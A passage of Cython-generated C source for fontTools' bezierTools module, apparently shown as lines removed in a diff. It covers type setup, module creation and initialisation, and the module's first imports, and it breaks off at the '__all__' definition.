__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)) __PYX_ERR(0, 1459, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) < 0) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = 
&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) < 0) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - __Pyx_RefNannyFinishContext(); - return 0; - __pyx_L1_error:; - __Pyx_RefNannyFinishContext(); - return -1; -} - -static int __Pyx_modinit_type_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); - /*--- Type import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_variable_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); - /*--- Variable import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_function_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); - /*--- Function import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - - -#if PY_MAJOR_VERSION >= 3 -#if CYTHON_PEP489_MULTI_PHASE_INIT -static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ -static int __pyx_pymod_exec_bezierTools(PyObject* module); /*proto*/ -static PyModuleDef_Slot __pyx_moduledef_slots[] = { - {Py_mod_create, 
(void*)__pyx_pymod_create}, - {Py_mod_exec, (void*)__pyx_pymod_exec_bezierTools}, - {0, NULL} -}; -#endif - -#ifdef __cplusplus -namespace { - struct PyModuleDef __pyx_moduledef = - #else - static struct PyModuleDef __pyx_moduledef = - #endif - { - PyModuleDef_HEAD_INIT, - "bezierTools", - __pyx_k_fontTools_misc_bezierTools_py_to, /* m_doc */ - #if CYTHON_PEP489_MULTI_PHASE_INIT - 0, /* m_size */ - #elif CYTHON_USE_MODULE_STATE - sizeof(__pyx_mstate), /* m_size */ - #else - -1, /* m_size */ - #endif - __pyx_methods /* m_methods */, - #if CYTHON_PEP489_MULTI_PHASE_INIT - __pyx_moduledef_slots, /* m_slots */ - #else - NULL, /* m_reload */ - #endif - #if CYTHON_USE_MODULE_STATE - __pyx_m_traverse, /* m_traverse */ - __pyx_m_clear, /* m_clear */ - NULL /* m_free */ - #else - NULL, /* m_traverse */ - NULL, /* m_clear */ - NULL /* m_free */ - #endif - }; - #ifdef __cplusplus -} /* anonymous namespace */ -#endif -#endif - -#ifndef CYTHON_NO_PYINIT_EXPORT -#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC -#elif PY_MAJOR_VERSION < 3 -#ifdef __cplusplus -#define __Pyx_PyMODINIT_FUNC extern "C" void -#else -#define __Pyx_PyMODINIT_FUNC void -#endif -#else -#ifdef __cplusplus -#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * -#else -#define __Pyx_PyMODINIT_FUNC PyObject * -#endif -#endif - - -#if PY_MAJOR_VERSION < 3 -__Pyx_PyMODINIT_FUNC initbezierTools(void) CYTHON_SMALL_CODE; /*proto*/ -__Pyx_PyMODINIT_FUNC initbezierTools(void) -#else -__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void) CYTHON_SMALL_CODE; /*proto*/ -__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void) -#if CYTHON_PEP489_MULTI_PHASE_INIT -{ - return PyModuleDef_Init(&__pyx_moduledef); -} -static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { - #if PY_VERSION_HEX >= 0x030700A1 - static PY_INT64_T main_interpreter_id = -1; - PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); - if (main_interpreter_id == -1) { - main_interpreter_id = current_id; - return (unlikely(current_id == -1)) ? 
-1 : 0; - } else if (unlikely(main_interpreter_id != current_id)) - #else - static PyInterpreterState *main_interpreter = NULL; - PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; - if (!main_interpreter) { - main_interpreter = current_interpreter; - } else if (unlikely(main_interpreter != current_interpreter)) - #endif - { - PyErr_SetString( - PyExc_ImportError, - "Interpreter change detected - this module can only be loaded into one interpreter per process."); - return -1; - } - return 0; -} -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) -#else -static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) -#endif -{ - PyObject *value = PyObject_GetAttrString(spec, from_name); - int result = 0; - if (likely(value)) { - if (allow_none || value != Py_None) { -#if CYTHON_COMPILING_IN_LIMITED_API - result = PyModule_AddObject(module, to_name, value); -#else - result = PyDict_SetItemString(moddict, to_name, value); -#endif - } - Py_DECREF(value); - } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { - PyErr_Clear(); - } else { - result = -1; - } - return result; -} -static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { - PyObject *module = NULL, *moddict, *modname; - CYTHON_UNUSED_VAR(def); - if (__Pyx_check_single_interpreter()) - return NULL; - if (__pyx_m) - return __Pyx_NewRef(__pyx_m); - modname = PyObject_GetAttrString(spec, "name"); - if (unlikely(!modname)) goto bad; - module = PyModule_NewObject(modname); - Py_DECREF(modname); - if (unlikely(!module)) goto bad; -#if CYTHON_COMPILING_IN_LIMITED_API - moddict = module; -#else - moddict = PyModule_GetDict(module); - if (unlikely(!moddict)) goto bad; -#endif - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", 
"__loader__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; - return module; -bad: - Py_XDECREF(module); - return NULL; -} - - -static CYTHON_SMALL_CODE int __pyx_pymod_exec_bezierTools(PyObject *__pyx_pyinit_module) -#endif -#endif -{ - int stringtab_initialized = 0; - #if CYTHON_USE_MODULE_STATE - int pystate_addmodule_run = 0; - #endif - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - #if CYTHON_PEP489_MULTI_PHASE_INIT - if (__pyx_m) { - if (__pyx_m == __pyx_pyinit_module) return 0; - PyErr_SetString(PyExc_RuntimeError, "Module 'bezierTools' has already been imported. 
Re-initialisation is not supported."); - return -1; - } - #elif PY_MAJOR_VERSION >= 3 - if (__pyx_m) return __Pyx_NewRef(__pyx_m); - #endif - /*--- Module creation code ---*/ - #if CYTHON_PEP489_MULTI_PHASE_INIT - __pyx_m = __pyx_pyinit_module; - Py_INCREF(__pyx_m); - #else - #if PY_MAJOR_VERSION < 3 - __pyx_m = Py_InitModule4("bezierTools", __pyx_methods, __pyx_k_fontTools_misc_bezierTools_py_to, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); - if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) - #elif CYTHON_USE_MODULE_STATE - __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) - { - int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); - __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to bezierTools pseudovariable */ - if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - pystate_addmodule_run = 1; - } - #else - __pyx_m = PyModule_Create(&__pyx_moduledef); - if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #endif - CYTHON_UNUSED_VAR(__pyx_t_1); - __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_d); - __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_b); - __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_cython_runtime); - if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #if CYTHON_REFNANNY -__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); -if (!__Pyx_RefNanny) { - PyErr_Clear(); - __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); - if (!__Pyx_RefNanny) - Py_FatalError("failed to import 'refnanny' module"); -} -#endif - __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void)", 0); - if 
(__Pyx_check_binary_version(__PYX_LIMITED_VERSION_HEX, __Pyx_get_runtime_version(), CYTHON_COMPILING_IN_LIMITED_API) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #ifdef __Pxy_PyFrame_Initialize_Offsets - __Pxy_PyFrame_Initialize_Offsets(); - #endif - __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) - #ifdef __Pyx_CyFunction_USED - if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_FusedFunction_USED - if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_Coroutine_USED - if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_Generator_USED - if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_StopAsyncIteration_USED - if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - /*--- Library function declarations ---*/ - /*--- Threads initialization code ---*/ - #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS - PyEval_InitThreads(); - #endif - /*--- Initialize various global constants etc. 
---*/ - if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - stringtab_initialized = 1; - if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) - if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - if (__pyx_module_is_main_fontTools__misc__bezierTools) { - if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - } - #if PY_MAJOR_VERSION >= 3 - { - PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) - if (!PyDict_GetItemString(modules, "fontTools.misc.bezierTools")) { - if (unlikely((PyDict_SetItemString(modules, "fontTools.misc.bezierTools", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - } - } - #endif - /*--- Builtin init code ---*/ - if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - /*--- Constants init code ---*/ - if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - /*--- Global type/function init code ---*/ - (void)__Pyx_modinit_global_init_code(); - (void)__Pyx_modinit_variable_export_code(); - (void)__Pyx_modinit_function_export_code(); - if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - (void)__Pyx_modinit_type_import_code(); - (void)__Pyx_modinit_variable_import_code(); - (void)__Pyx_modinit_function_import_code(); - /*--- Execution code ---*/ - #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) - if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - - /* "fontTools/misc/bezierTools.py":5 - * """ - * - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea # <<<<<<<<<<<<<< - * from fontTools.misc.transform import Identity - * import math - */ - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - 
__Pyx_INCREF(__pyx_n_s_calcBounds); - __Pyx_GIVEREF(__pyx_n_s_calcBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_calcBounds)) __PYX_ERR(0, 5, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_sectRect); - __Pyx_GIVEREF(__pyx_n_s_sectRect); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_s_sectRect)) __PYX_ERR(0, 5, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_rectArea); - __Pyx_GIVEREF(__pyx_n_s_rectArea); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_s_rectArea)) __PYX_ERR(0, 5, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_fontTools_misc_arrayTools, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcBounds, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_sectRect); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_sectRect, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_rectArea, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":6 - * - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea - * from fontTools.misc.transform import Identity # <<<<<<<<<<<<<< - * import math - * from collections import namedtuple - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - 
__Pyx_INCREF(__pyx_n_s_Identity); - __Pyx_GIVEREF(__pyx_n_s_Identity); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_Identity)) __PYX_ERR(0, 6, __pyx_L1_error); - __pyx_t_2 = __Pyx_Import(__pyx_n_s_fontTools_misc_transform, __pyx_t_3, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_2, __pyx_n_s_Identity); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_Identity, __pyx_t_3) < 0) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":7 - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea - * from fontTools.misc.transform import Identity - * import math # <<<<<<<<<<<<<< - * from collections import namedtuple - * - */ - __pyx_t_2 = __Pyx_ImportDottedModule(__pyx_n_s_math, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 7, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_math, __pyx_t_2) < 0) __PYX_ERR(0, 7, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":8 - * from fontTools.misc.transform import Identity - * import math - * from collections import namedtuple # <<<<<<<<<<<<<< - * - * try: - */ - __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_s_namedtuple); - __Pyx_GIVEREF(__pyx_n_s_namedtuple); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_namedtuple)) __PYX_ERR(0, 8, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_collections, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_namedtuple); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 8, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_namedtuple, __pyx_t_2) < 0) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_4, &__pyx_t_5); - __Pyx_XGOTREF(__pyx_t_1); - __Pyx_XGOTREF(__pyx_t_4); - __Pyx_XGOTREF(__pyx_t_5); - /*try:*/ { - - /* "fontTools/misc/bezierTools.py":13 - * import cython - * - * COMPILED = cython.compiled # <<<<<<<<<<<<<< - * except (AttributeError, ImportError): - * # if cython not installed, use mock module with no-op decorators and types - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_COMPILED, Py_True) < 0) __PYX_ERR(0, 13, __pyx_L2_error) - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - } - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - goto __pyx_L7_try_end; - __pyx_L2_error:; - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":14 - * - * COMPILED = cython.compiled - * except (AttributeError, ImportError): # <<<<<<<<<<<<<< - * # if cython not installed, use mock module with no-op decorators and types - * from fontTools.misc import cython - */ - __pyx_t_6 = __Pyx_PyErr_ExceptionMatches2(__pyx_builtin_AttributeError, __pyx_builtin_ImportError); - if (__pyx_t_6) { - __Pyx_AddTraceback("fontTools.misc.bezierTools", __pyx_clineno, __pyx_lineno, __pyx_filename); - if (__Pyx_GetException(&__pyx_t_3, &__pyx_t_2, &__pyx_t_7) < 0) __PYX_ERR(0, 14, __pyx_L4_except_error) - __Pyx_XGOTREF(__pyx_t_3); - __Pyx_XGOTREF(__pyx_t_2); - __Pyx_XGOTREF(__pyx_t_7); - - /* 
"fontTools/misc/bezierTools.py":16 - * except (AttributeError, ImportError): - * # if cython not installed, use mock module with no-op decorators and types - * from fontTools.misc import cython # <<<<<<<<<<<<<< - * - * COMPILED = False - */ - __pyx_t_8 = PyList_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_n_s_cython); - __Pyx_GIVEREF(__pyx_n_s_cython); - if (__Pyx_PyList_SET_ITEM(__pyx_t_8, 0, __pyx_n_s_cython)) __PYX_ERR(0, 16, __pyx_L4_except_error); - __pyx_t_9 = __Pyx_Import(__pyx_n_s_fontTools_misc, __pyx_t_8, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_ImportFrom(__pyx_t_9, __pyx_n_s_cython); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cython, __pyx_t_8) < 0) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":18 - * from fontTools.misc import cython - * - * COMPILED = False # <<<<<<<<<<<<<< - * - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_COMPILED, Py_False) < 0) __PYX_ERR(0, 18, __pyx_L4_except_error) - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L3_exception_handled; - } - goto __pyx_L4_except_error; - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - __pyx_L4_except_error:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_4); - __Pyx_XGIVEREF(__pyx_t_5); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_4, __pyx_t_5); - goto __pyx_L1_error; - __pyx_L3_exception_handled:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_4); - __Pyx_XGIVEREF(__pyx_t_5); - __Pyx_ExceptionReset(__pyx_t_1, 
__pyx_t_4, __pyx_t_5); - __pyx_L7_try_end:; - } - - /* "fontTools/misc/bezierTools.py":21 - * - * - * Intersection = namedtuple("Intersection", ["pt", "t1", "t2"]) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_namedtuple); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_u_pt); - __Pyx_GIVEREF(__pyx_n_u_pt); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_u_pt)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_t1); - __Pyx_GIVEREF(__pyx_n_u_t1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_u_t1)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_t2); - __Pyx_GIVEREF(__pyx_n_u_t2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_u_t2)) __PYX_ERR(0, 21, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_n_u_Intersection); - __Pyx_GIVEREF(__pyx_n_u_Intersection); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_n_u_Intersection)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (PyDict_SetItem(__pyx_d, __pyx_n_s_Intersection, __pyx_t_2) < 0) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":24 - * - * - * __all__ = [ # 